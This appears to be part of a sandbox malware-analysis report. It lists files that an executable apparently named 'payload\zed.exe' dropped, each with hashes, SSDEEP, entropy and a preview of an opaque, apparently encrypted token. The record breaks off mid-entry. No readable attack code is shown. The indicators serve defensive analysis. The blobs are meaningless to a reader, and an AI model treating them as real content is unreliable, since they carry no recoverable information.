                                                                                                                                                                                                                                            Preview:gAAAAABnTC64Y31Tu33OVsp7r5R7fqljWP-Gqf6DpfHDQqP8Mb99WiZSYhsFoEadcrs67TvVyhouyQTcZ11eNBZWlv2oDvSd1VOMrhusceQxUCuQ8Y6wEvnup1iL2fhbr-mLhXzPyxb9QONqen_0m7g6Ef7A9f9X9Ov2wxyhC-0MGJTzFmTGN0nRv0xoTebtntDw6P_Ig73bPghYtNTCBD2IT9dN6fluV7s0FmgqqVGH5X50dXIWCjcv6Camx3-Ttgt5Se84uCgMycRFij2UhFAExlssc2Fvbd-FrapM3pk21J4iVtbYOHAtHcabhRegyNok95zQpH6ENMA5dcSCSMIAalrrhR37tW1zlzsejJCQw0sSshPIwkVNVGbXd2c59mu9gbsUOvg_QCH1w-Kj-1GO5pZZg3DkR0XFl5Q3VKd1QMCUIWtsMWe8GgtcA8TKrnY6hevzSwIxCz6aAiQZ-d56yZLA5wFmoC1IImOY8plxq5aGXSZ7HPIDBghODFrWhyOIaLrrPV5cV_WtjczXiMlHdaoFwRthy042PUE9mWOR1vs0KhLk3xZ-37lSTzsGdIdjpytijjlkMLtJcsca_YSvFCThXQNT48tbMBBZaWYjR6zSZfVKjcImp64ARyCtKBdqzDDfVVwRP788SDgcN0yIoamtH7le3kI8DujgcegJjSmKObJD1x_qSRL9ZPT9My03U4h-XBIpc34LlYO-a3BQZXMKkbUOg8qx6nbpGS_LjWOisJkA1dNBoIu30RaFfi5NRYcR9RgNiAZOOjYEW6Fa8eoI8faDvYslskWBHu97ZJwSSpJlbeLsYeMv4X2jSySXEhRf6fLjUY5Tle2Oo9GjsYVIaDU-BO6nNgQc6E0geQNfZOWoZIun7jq-EQ3AP4I1_2wHgsVQXyLtJ2ybq5DfEFt3UruQzSHSTVJWNNYYC-oM3-6hTqKRQgei0xwF4SVvO9nChQfxWdfLy8Mgq74BuZ9k0H9PCvEs3opu
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.976203982992238
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:/DOOihihJUjqOuJh3Q7jDYJAZTa4p1eTV4OjHEApGN:6aSjqOsh3QrAghHeTVfjPGN
                                                                                                                                                                                                                                            MD5:7621DAA7119048F0CFD081ABF80B8F19
                                                                                                                                                                                                                                            SHA1:9721256AD4FCC05336F2CDF1A1D66471201461C4
                                                                                                                                                                                                                                            SHA-256:CCDFE9DF0A7B5353A326B38884741401224900967B97F54CA5EDB704589C1549
                                                                                                                                                                                                                                            SHA-512:927D8D3726930C94ED3C043FC6B4D6AF8520864CFDDB7B1F116D2F30AC14E2CA52054EAE67ABB669A11388BFC0506655260A0762876DFB07B15CC36E8D8138AC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC642p3B9AYKzpYO8l71vw4lpCfs1jGEDGH4EqW-gqK_9MUbxI9AG4hRLDkFmVAGJUftlgTP7gP7PVFc1AN0hQ1TSsmtff47l7TpevFUbYuWUuUJT_VCXblgzqD-EqHxvshrHlnzDBduYqkqIIbjadA1V12qkkedXqBjbsSHbfVDBaeIXc0q4naZw_bUD9q_LMY1v9VXdDTKs5W0aOw2R8xZasblhtMxV6Qm6PEirXCyoV2VUou6JE82D_2AnwJNzekBI8tCQD8XutrpnGfa1S253bmmlW4yZxGb1ZKNCTQ5WcrL4xs55NKdUADwObfCxPR14SZgzNOnTPavCbtNM3eTKwHTU338YrZ9cPFuNrTnsmE3QhHiIdkyLAr-0VFAj0jofmXxkOSMl0tmdifGhCOQxOgeHmyR21HA_cQT8RDzXiSNcb_CzzJSew979OPWBglo7G4rhZ875L1ctLtkSTlrSNixSbeak2K_0hZh4Q8ZLcDj81049P_UZxMPVIP_oBS9Ct8WB1sCoZY2b8o7GuTJwSnH8aplkn5Hfd2Fw2vraaq_VEFwQPHPEFs50xsAa5E6TOVL0--sngZ07h3_YUcvBiMfmISOg1vsBl8vyL7zPa_Ytsy7PI5oUNqAA4leh7UkmGG-28P8fBeNce3EOPnuOvFBnPMwCNwR6pjWkHzsz3G2WM05lJQU-X9QzZxbqUMt2vcrPvzAyXc0MfD31gf4OCLdbqtFngeAAgvgyZaaXuELJfGBkOKDaHet6-SLf8MR7ik15TUTIWs9xEeqHjqbCf-ZbvQ0P7iTNaFqt2yUemDfLL-tS_l9fKckPbfZWRaHLJh_2PhRrrovTibBOnqH0LLevKhkUBKbIHM7pqX5qWaONle-Jut4pKhM6dnFrNSVQUkdXtTGSQ8uoVjkH3Lqj-Mv7R4tjJ2ZFPo5giSPoIfGYBTdaI7BXcWGZBHb2pIH0RBNk524CFtlWd_ekq5v2qVqm_Hs
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.978241615386815
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:mDOTuXp0Us8Iwu1+I6lO1NaYa3/wF/gjM1E+7PeHp+4:cOTu50Ui6lqNKUgqE+mF
                                                                                                                                                                                                                                            MD5:82AD6447DE02A3ECF6BD2216A6A98B34
                                                                                                                                                                                                                                            SHA1:48DECFFD4447E9F16AF981865F0D5AB8DA0C45B8
                                                                                                                                                                                                                                            SHA-256:954720067CDC73454359A58C2A90B05442F752A140B49812F8B1278E722DF75F
                                                                                                                                                                                                                                            SHA-512:BDB8504D47C752B6D85EE93538030EC76436393B9269AC86712A863625F7AA7E227F39F2AE0ACB5A9A5418921D535BDDD9E1FD79FB956F814255DD853953E9D3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64uyM7_3Sc_InjIlnEPnJo75Jna5UmRHsCwHAJ-pziNeiQZo9YffRZ0j34VdqAFJksRvn3dbTDfz_tANpn9-Xa8SqEST2fpq79S4CZDa3EZmFqLIRpQzOj6twIaVVCYT6fNdkbD9CTL8UJxkS8jBLudUzrL44nkcYEvglBoFLzOZIn11wwUHPy7dgGk6VRoEFD48NWTW0_NtgwD6Qh7YFqeGvs9bsBjLu-lOuvbfHqIMTnwplJ_bJ0aRoydNr6Jt7nxvkYSJt444ibtgyjapVsmF2FmeIzReyq5-_fNtA6gZvK2WhdTrvA9gbw9MR-4cg2wmgGqqh90tP0asK6OnTnisZnC_E26I4r4v5eU2omN_C3-o69VfbmbHozECWcgfb5IKqqbnU2SxMrFvFlKmxrRcqRsnDsNLhW3vEzCxXI4OQqF8P5mhwcmTbkiNwo2McsUuygr9NBp7Ng-xblE5AfTW51x_6Ota14OQ3XSZvpx3MECKL9_1opYa_QurnlFObET2HRRM9EnAGRpif2kgGbQ7DNmKZrri3Ow5sv9qUXi9RNRYVa8HWIEe9dBjL1EpPYj18EP8mt9u1tHHVWOZgeC_3zMNj4pmcR-iYLYJxqwk0LlSD3SCndA5Y2nkwFNSMu_PU-JQgELZapDAhvlwxaan7N7mdP9MnkTby4hTckrSpDkxXcHFUGVbLbzSqn9XMWy53htJwRXyZA3Ogl3hnZ6t_nMuoTh1aYWKBQ9kuipoYtAolP4Kk7uoy776JidufgFsQshhvZH2FLmUEgZ8ZlgH_AzH7YwETkL72RHlQvYIQL6RYd8oUnvXpmWVueQ7C_EF60K6eVn8LPMsM2bLsh_kuO-lvrhNbmtU5o8i1zxBNesT6AeWm6RlU7z9kDTcTHP0cDGOXIuF0oGBD9nJK1x8lAbs_z3cE1MJxv9yTcDXWnNjgHmzx3XKnEhEptkxS6ejznkPEo5tu-Te9OPpUC7N5jOFdh
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.98304272190175
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:BijmieXorRGODdY54usXH2u++46g6cZRvZObnNb0y021zslW8AJZ5xwa3C1:CewbJGsXr++jg62RRObNwVszN8AJvOx1
                                                                                                                                                                                                                                            MD5:42CD1A16C6DB2AE7A6F1BF9B08504095
                                                                                                                                                                                                                                            SHA1:1F3AB29279840F79066257E7294692639DDAFA38
                                                                                                                                                                                                                                            SHA-256:E976B93D7F91B279334CFF088F2371B16569300E2890CDBD34E393C4C21BAD9F
                                                                                                                                                                                                                                            SHA-512:4C8FF087DBD1838150288F296C16546E139E9B79675BC30D55A47A37C2E1612D28F6296EBE5A548CA8890DB0929152DCE59017F06A0B14C32200E678A2BF9B2B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64QMKhyrkeqB7viwY0d5msa7H83xRuK-iMvDKYtg3eTCQAsilmazbJbaEAt3wfE1iBu_6DvIUqbuGR24LCFA6OZsDAdBTu-_1fXVpnv754XQLhsafAe1jen1lyMihEBtdfH8pLbsRXKcPdFV_CWzRDYNOiTh7tmbP6jpgJRgcKyR4Nqapb4odEhrnN6LaZW74WMJwS0L9H9U9FqyYpMNuSQuVMyoZrZB9cWO8EYVItoGyAc9l08oQ556JWTZdI0tonY7y-sY2hTUv2q_qtszR5ogb1BH-U64zFoyYTAzlg-vwi8KdFecH72bVB8RK47MUXRoqI5qoWrK1tp4yBeMsf2eMu4eAKt3oQCoeWSD1z0O0gmouV60AhtN4Z0h7Xrno6dtLr9ywBGaixd3cBQIMJvNOEwtG5xfYEssiSSfEGlHDxSVMUl13Cu5X_qOslUtU4XlOvZfTQB5DoqEDI9x2LNqHwdyAGZrGIn61nAiVmHahYbs6bvTjCgrPTs0lyEATnqJ3LUghGEc7RjJsqQk5UK8B2zQEUwVOd2oNlhphMKXRTz-ZDkSh27patG81r3IF912MBUjyQSQHuRjUodrQnswtIbOYdIaBF8W-o8snx1pW5rf7anWSRPqff34vUvnf_Erab-jGRZYySgslrP5Qj31p9NXnQlid4Ztsq133Mg57AsZordwU5welqr5ovdXS7ICHofymHge-Jb484QH9TdTsIcdbwpGEE5Iia5QzbjQdDeyqw4dAqKjjYi_FbR3WBH4s6slP3XHfSk0K0AN2dO2oZPf8zNYJZDNkntAKj69NUcGrqFsPnj7BucnGXA8wB_Mp0ZEtXrUbcZhckQAuU2jFEJg8nA5Jt9sTKVY7QczLxAX808-S4qHz-eXuruQ6aeC-tf4URsc0PgmkdTURZfkKyltNmMyqJwOoneGGGBMO9oDJDiu2zDxsTaiHjTSAkmtOuxZRBkuK_1fM62jBPBNGKdEh0
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.974076889337141
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:iU1KXfsx0bti2vpRpM1ZTzxIk2gd55bnYElYEUzpC0tTn7eQF+ZutXD:iEKXkWlpUZTz+k1XYEUzph7i8YuhD
                                                                                                                                                                                                                                            MD5:6FD35285883933CE80E00158A9936AD2
                                                                                                                                                                                                                                            SHA1:6964A5099BEE789F6A199946A38FD64454743BD9
                                                                                                                                                                                                                                            SHA-256:696D37460C6D0A5E9C1D511CC7FC3B170314BBAF44D29C335DEA100FD3411971
                                                                                                                                                                                                                                            SHA-512:FEA42F14FFD1BC3FE354A105F120ADDDB89ACB76C6F3AE56DF8E3C267F7B0873AE8486CBCE01E961CDFD09461A0037F29A5B9DC17088D7CCAFF1721F518A4853
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64krnK2WIIukeY-IJ7BKd8nmi5UhYeSSBnEUpKwEVXI1T0aPRddrFEM0wrti4pD0iCtGbkEg2A_7xWZWMjlwCRu-Be8JCLMRTrdZF7ROt_hA_QbSPgKN82LPj4WHaomq4BjSTE7jsxk_bp7a4FWYELvRj7sVTAcVgo6VQnV2zuqZC0jh1Hx3mydHK19uj05CmrXADZj4ObNHi9A5lMjD-TPtCmKdP775l0Q3qPBCxcpTMOVrZm3ooFcfiLT_NaCzPiC1pxYBm2wnnjEyEqy7DeA7erlr1xknBf3e018cBQthnj7AuUsaOtTxrZ_jR8Hmy0zNc08IQh-1JsgI7Ka3Gv6ssU6uwVvvN6hK3Iwg6dnCPRYQN7gDcepASR_vUqGQdeprI34ESqMJCnfanUNKFrWxJ-H2lDN88AK5RGEslLo_cgHgdeWQxxmCQhH15B47A1L3G20-RKsSkz4IrlEFLcivZbTaHxrI8HxPX2EarIlnKZcmGvnbg4T9ggT3x3Bvuc3xmzz7A_KlFKytMGlkEYCE7K27LIvAgxvvGL1afkz-S_XWZwWHvdGFSrco02D3_PoKscknSrxu4dJ-23pL_ryPtc9TnLryELWCgicnn-qEclolPnNaeF0Aqb0J5llZLX67glW2lg77YW-CUYr6ZNWTGAGERKLB79cz74r27oZhEXnHO4MgZHe5-d9wsXvcGu2DOlay5R3NWUGpR5BEib8eOn0tiFrjuG9xdaD7WNaaAFU3DugYXoEnz0-HCNN_HbM2Y0J66Q5ktSMgfLZiyG9f4kRWq2027PiGj_H-hqXPBY3GfSxcIOWe-CRA3X0VGicgjmRm4l7kdi5LtwrkJh87XOOdi7AtnVOOj9JNvnSEtZDfPN4YGD690qyHP5oBv8CFBP_d2DDqqwbGkmTJwUTHtpl7SbmgkJjpREJDUP1F3winn07sTL7JtdF8fEwZC_22xD76-7LB8kSbfVyc6HCaVxDpjB
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.986551661549754
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:Tue/4MSfwygid8vm6B02OSER3rPSK+tgbHWTt5fnEBFhyxSk:TTQ7Nevm6C2OrR7PR+tgDWTt5vyHyYk
                                                                                                                                                                                                                                            MD5:DA77E6A3D55DE3D1090B25FF50B4F048
                                                                                                                                                                                                                                            SHA1:89934941DEC60CF1993DB9A3F459FE4277E614D4
                                                                                                                                                                                                                                            SHA-256:9CC6444538E5A12303064F19F4E99D6713CFDB256D65561733DBFE18AA70D2AD
                                                                                                                                                                                                                                            SHA-512:AB6F4AD671BEFF05581A8D66C1E1F0E0D7E8FED0312051FD8EF54DE2E80FD22D570F0AFD075073A56F3454CF3C9E1B52723BBFA868F6E535B50E53A1FD6DD60C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64TDVAUOrnRYbgiaLJO92jyMezm3f0fD95leUu_FCWhnbD7JaP3YlGBWRITHiUvzMkY9zICH6fKQXmViPRCzC7oKT-4HjRO8CVn4-n9IqCRJ-uI0HbMbA8WKXbB51Soj2OI3I4uhhgQPrl3VL5D7PUuZ36aRSui7lmcATnigCd_FVajVP02AFQyHbQAAevT9tIWeWrsE10ljYgtJwOG6DSavn8NXVy9WWO5B8R5pCJ8YxfaXw1-mpkeHKhUP--gA8fFlXg-CdnOpZnWZjoNcn_9jPqMbVzr_WO0PmPUFfCIRTNYP_wxQbUmE6dKqYClzN114ANhVZ2oqW_1WejrQO7gDGGoEujFNRRGWaLR2vlLceuZ0-kKtGkDgZbX78hq6wrrmgN_qAq6tepXDbjjbjvQuajyXYASKwu_4COEDunSr03VEBVp1y7NUO_vps9TwRfqmsQsoF4YpstByEMyRvXbgh6gB_8kqJe_wfn7V2_94YuDUHptWgXfvuiTt2VNHHmmAq2QD7mFGm7o9AkS9scHUMsGwD5DTm-zcnj3Fa1JGAupi5A2ufcMoFFB1RoxKsJWu4TOmCNOlsgM8aaisEcmYZxTJFOAoYglIGe7w34EtBVib9k7P9ksB1JRgJ3H__Ic1KbOar83wk08XxiQAAve7dakWKPVvm-85MVKNioDJ7IhjY1dyXgBTwdP6Lg_0gTcfmxZD1ofRqmeurDTLExo80oYIx-srDMlGqrzKcxy9knSmL4cyaijCT8kFW7HfRuPLS1AwA52TgjnlB5YMCYSrGPmaRcNNqXS7zwlhiQ8m-iWIMfvoRWTCdlw6UG4Gq9Ri0faBjB-t0OGMbkPt5ktnBwdfpEfNQ3-KEG3_y6N-_MW7_1Glp-CbFdJg3srlGbLacojAzZ0i7CiRIjtc59SkvXshcF-1OSqKjPaTv7B6d6UvoXouzJPW9GqFZMiBIrcM5qbTQae8Osv3IXTTqghWMdGrH_
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.981485861367719
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:b2NO0vJRTdOcF/jnmVVXYGBbqFWH697025wW:b2NOHctmV1XbqFZa25wW
                                                                                                                                                                                                                                            MD5:8F008924AFDEA6115984587EE6DDCF55
                                                                                                                                                                                                                                            SHA1:FC82C6B35A8E6F689DE18C756541570EF2A6A8D6
                                                                                                                                                                                                                                            SHA-256:82816F3C1F6131CC3FE6B8743A70A8112A3DB00073FBADAA933C8ABC3D8E4BE6
                                                                                                                                                                                                                                            SHA-512:EFBF8E9475AE67B42A5979815334B6F561BBA87C8E8FC427D4D855242E6FF4B89B8E62C22F8F1078AC0B69AC7D8B543D6E518C0B916DC7C471135F77CF79A133
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64Hk7u8I0JDzy8cDZs3m6YxzwWpwfAshXWN0SUOEXjHlscXQz6D-Bg7xMrHtdUxMR3tVX2OD7K6ORsxd1r-4QpIhKAgOMLlZ4QYOTl9ivrFB4Uhs_x8ZQ12DhnI6WRJTTrvJKo1JXQlQdq8z8n5_h7BWlutLMKXmHNgLE6ssE4ZOI-j9gJBZZgZs68-Jio6KFALB0jIKdeTrxriIV8tdeSEx3ZjhyaAnZ6zBLAIpDqw78UGrq01dnqnOWDr0uMBDjuRaW4shAeGil9dkqkDgdCI52jmbzGACMF-t9AhEw-DQIFQzX1xHYa87VQZkwva3QELUSy7hDTjD5XFPnAkpC-kU9ZXuYR4urU-IchWy775SFEzxoyLq964uq71Z8EsfkJrME5Vvtesfm-QKkvolPHkpHekSu2mFmK2Qi37-xbywZJTFa0xQuUapWEGHzY6zjM5jnvDISmDT4eyQeC_VLEvm27ZzI8XIjTcfp8sBCfTvspO4W_UE5qjHQXcBLfVPQFmngv0PGEFqoO3kV8W8On30TRq9nwdIUYGB0eATNTz0E-Ie5kEgsQSAMvWXQUWsNzsr8gcXCwTPJHPxWwGj_6UbxnYrxSEEAk-VzJh2MdPHYBwbj6qVJUiP_Pv-u6ISfQ74YRWMoRPZ4H7KboWt7SjVYKMsWhqmxoYmkfnH_DQJ4vO5gM9Tnbwz1sq3t6S67mjJDFlI5QIvzP6p9_RhFqfmJHRqFvoOsWGlUCmuvIrBM2mgS-TQNFE8gYfRDP-0nBGw_OiSz_QCU5X0iu2ZhCV3vx-iTZSkzsGPemxkm9_1uPv6DrRVZYkG559MQSFu-1XUMFhVAU-aokdCdGak-uADPDK3eZs6icM4m1QLR3PlXFWUvdAPMQu_9zTggUn-vmYCBQ2ym4IhBacY3ElNR4K8FWbyvzSz_PoKjhF_ENubQK_ChocdWlrZhDn3r6WI0KskOGbk6iAZQkSbgsiYV0IAGjaGTw
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.987779392749443
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:WIIJJmkcvpfkENrlzIuPqYM61JXe4E+sEOJYSQ9Q:dIJJNoFkgnqY9pHPscSH
                                                                                                                                                                                                                                            MD5:1436E217792DDDE92D2EA2F020210746
                                                                                                                                                                                                                                            SHA1:008F01C052B4F6CB3E43CEB42B8E6BD67A0025EE
                                                                                                                                                                                                                                            SHA-256:B77767F1F728E45AF9F9A6402E4B8719FF4C87696E6991CA85FF925CF1898CA9
                                                                                                                                                                                                                                            SHA-512:B1144814D5CA5002834A2B7B71CD730893EFB4754C955B0EA6AB8919C8F41115DCDA178B5F6CB5923D852B6606E31AA97DC60AF30FB6FB13E51DBB7C447227F3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64nbnSIgwTQXP_Og1M5s9NGP20GwLFo4TEYZoc4FRhecM5-9Jc_BIWGjiX3Kf7VIFf7rCX7K8-UAhcnBCSXIT2JRpcKGFnYqqlRi3aMVrdH82ayHic8LILEvRWk3jbHMJmepo0V25nTabdYN_Q4gQfgpEGL1THBEi1brIuw1QIIWPuKb_-z7-ba2h4SGcm-lYRK4kxsWWIyMKPjFHCzYI09pCKCpSGtFPdICYT8u_3i20jKpnS3aOB1Ed8vEJNjIJtbbZySECMmQXyA8D3QpgaZdLzLZfnQzxCgspAQK5eHktvy92vRpOT97i2uCsoAsDN8iNmw22V4pyc9gtH0Yfo5ulxVkQf--LQtfYWxQN3AdHORfZQ51rjWUNHAtEOi7w7IfZRXtTLJGTMFjJ9ItL67_eozw4yI_Ek-gxKD9F3CERZo5NTZuvbdwhXLicrVKIK7gtXDnojfqtxnBkwmE03os0yaflPw4JkFlBGYS3qJ3IVkgCyepAtD6wfdLcgevcOkLoxtcQ5n8ZdjxW4O_UKbaAVPOf81IEWUJBlgaN7a2eMtwImNHOk96H9v6oU2AsiST4aMqy7o40n7si1Lu75xj7xYrC6tdfrn1bJ2M5TAZhWT2bgR9fDE8ff6ebCPWX4TIDuRwz_BqNPCpNSJLGi7nEKWZ5kP87Yugs1JiG03eScG-NoOyhety2mqnzfZlWKgi4x-sZ55-45WPVY4eyFjxNpqJbXzA0SRmK-haPSSXfxFEV6q6Mlyzu8a1Cupg5aWQ3HNupwPNDnfh782OdAtaZUHDa-Z4np0QSYjImSIAuioJ_icpSevt3JtYVISIZ-erB8M0WnaW7RK66SqUpbsitLjcb_FDzh2WL2wWyJCCE9hA5-dJy9dQkU3TJMckNGk1YEIlnPcmHzv_jO1tosbiohSVm7lrG84KmyRH0WPFMSzTh7R1WPFooxHG1idAHhmlb-4SJ60Nk54uGtA3UVDeBPqUPr
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.9844706064884035
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:WzuBHb9kNHfxd4PaEek0JDwDLUvHZ45KUO/5jCQsQMr2YkEe3DRALtkTOyEv6tbF:v0Bfxd4K+ea5W/sRzqDRbTOuFT9+vYvD
                                                                                                                                                                                                                                            MD5:8DCC83B3AD0F135C6322DF4D9868FAFD
                                                                                                                                                                                                                                            SHA1:FB9F31782C6950D7A219909FDAE89D450068DA3E
                                                                                                                                                                                                                                            SHA-256:5D196707DE68B399F34C114C13AC69BC3DA92D705C28519170C61D9273CB2CED
                                                                                                                                                                                                                                            SHA-512:D225BBA8E31A8AD54B01C9202DA721143A0579939C42EEE8E3E23280F5ED6869DCD5BE9362F44AEC15268CBBF31DDFD171141C317CB42086F3D5BCA4AA23B2E0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64H5_xsmOXrGgLBjOAzeg4_Q27s5z_GVXHr9ewXqW6mrXngzUIHEK8hdTwJJYn2siC4JwEIFT7HBsJunNMMKmvG4_q3_A6r1KFuxkOCwJwZu5EKr2Y_NA63v9zry7iYP04dpoDcWCSw-ZH-mUSmTbFCrPPKQf8QNL6hd80cY-rrLVpqJLxlgE6AK0kixWnxC8ToJlCrTSbAmcYgr5zs2A8R5cr3TSQnBTEcAZzS-mM8BtAACvAuEv9Qe5w6kXKhH7VgOp45B59Bn-hR-iCdvZDPEgKADjPXWuGo6yJFZ5gtwOP4eNRBQrloPPsCH7jxkkh1bKaSsmZgBcD2KVO9vxKGlpCGME72KFCBmcW8DAadBmbABTwWYsqWjT2OjfpH73OjVVJ-50UnpDXumCXQI-Pkp0kefLeiV6A3oKijq4Gneh3l_6K-z4idiaqzmvcRGkZXDJx2n3tHmto4q5beJCCs6z2pF6bsNjA02IpPvjL8APfxQBda206_heFh7mNxeUKQu_qZidsY8UNjbqFKbg4qDlEGjAWC8IHnEJVxRYgA2UoSZNWRzSrjEYfAyYTSxIcBzw6T9daK35P_e0Nz1CrUz_BX0hXLZiSMHZfSjfL-i-ZTtfPGndOw1j18ScjUEx22v84ynuftsLAVvy31fceqkk6uc8M3R8izczBL5tC9lRa2LffKteTp4hgeO_QIuTs7XPt1uUvg35MBt0ZhDdBKSjIISOBb9m4-Y3QmqEUcoNnv_ftLqSpcD-96ttqQrzpbyNdEtmPDqr3BbApiVyUHOs8LBk58-e_ypr4uhTfNBrb7_tuDRW43R4FZGnU_eMnR85YkuPdanuTDZPjvGl7NkcMW9VRxW69cWHXJgZB2AMWENqWt8okdg78apAn506ql4fehAN9Xlek1-9C-r3fEr9W-1TFctgW50dd5r6zLiU5etfnQ_UE_g4cPDb07a4q_HaEyXxINX9DzJm8jofu7sL7to06
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.977487515019747
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:GKT7eurDRiz3bRrVYN40rxDUfz3InZuJFKzACO:GKfeqtE3bRrV+4oDEqgDv
                                                                                                                                                                                                                                            MD5:C8EECA908F34D2BE124529C5E2878F62
                                                                                                                                                                                                                                            SHA1:82B915408D5EB52A79068F1CA038577A768D7467
                                                                                                                                                                                                                                            SHA-256:14C1A0D3553413E43024DEFBED6CCB61DB98B8005A47D656FC4795771B801D1E
                                                                                                                                                                                                                                            SHA-512:8BAB22EE282171B35F788A0FDE1824FA0B67CE2784C55557A4EA1144EFBB5666C9C922B4CE0C56A9D63A289A3DF84129039ADF4BC3039F6D16A7CB0F4E17F690
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64RS1dKcXUOfuO11u2HaDpDeuRHCRg26dpsIslVZEJS0f2XZDkfVbQooeHeLnn0YqDRpP9HAPigxjhmwWwi9l0OxE-crDvbgJ-I9v48u-L0-s6JWukBRmAVygss0ykqqn3l6tUz6yMw28SzNkW4g6Znd47lQpE45mnt1OcSnfx_Y3qg0pAuxFYGypMcIfDfXZSSr8fTV1-TsVh8vGa8_9WMcrdJt0fUKplysfkwMuLM7nTF16ko_p5eq-2TRKYNoiJmDytvJ9plyneNAAfasJtx_UNfZKifWxccigo5wHVQU27l5xVJsfjKXp-eKuZWH3Wy1JMOdtLgizT0YLYvgynY01V0RXlpJZCYHTdJAj_lmn_HQuwOt6rHsw1PQfk16KD4AJt8kBVEJmIA-tunmjvssHd6BnKh0OYNgIpSPH_K4vL_zo8muP3NPJI6SxGMELPm1B8F8Gh0skjOB1s6vd2B87zkd-CbgmY2srVUZQgatOP29_VvfsWFMQBtR5X9SglSlRR7GazGuwsd4NxLLpyteAg8y6BxtJrcPNn5PZKcmu7mqhKI0hbeB2eun5RF63CFuLfUaGM62RMjC3PARDisgTcQTF-S3KunaRwbqbSdXp1yCuMQfrZKa4igFQBjLVzxji8ABk6_3Wv25LKmn9a5VxM-cVasGCbG0fgyMYxhLpoEEKz3kMNTFxrmLXFkhsVftKqYznmn5pY3JFTgzaoy6V0ir1tJo00j0_rGPG4SCvZUUxI6RYW42FsHSm6pUpY5gM7Ox9sxMCaTLmNOVuas8sugYdCCLmV4k_K7juYfw3XQrqaEjgG6PHrgNRi-vBWyVCIN5PR1zjOEI1yls4VQnrkjKmVZMy_K1if8Ep7ckme7mvr-tLvL7RFtQ0rhMWd2Wn9kO38EkIKQWSs9VsiCGohX0rKpwgAiZdvQYlqtCpwV5WxqoVMW1OCjmV1pQwB3l2P8y4Lm1CSQs17j0SiBGW6d9qm
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.983113164728987
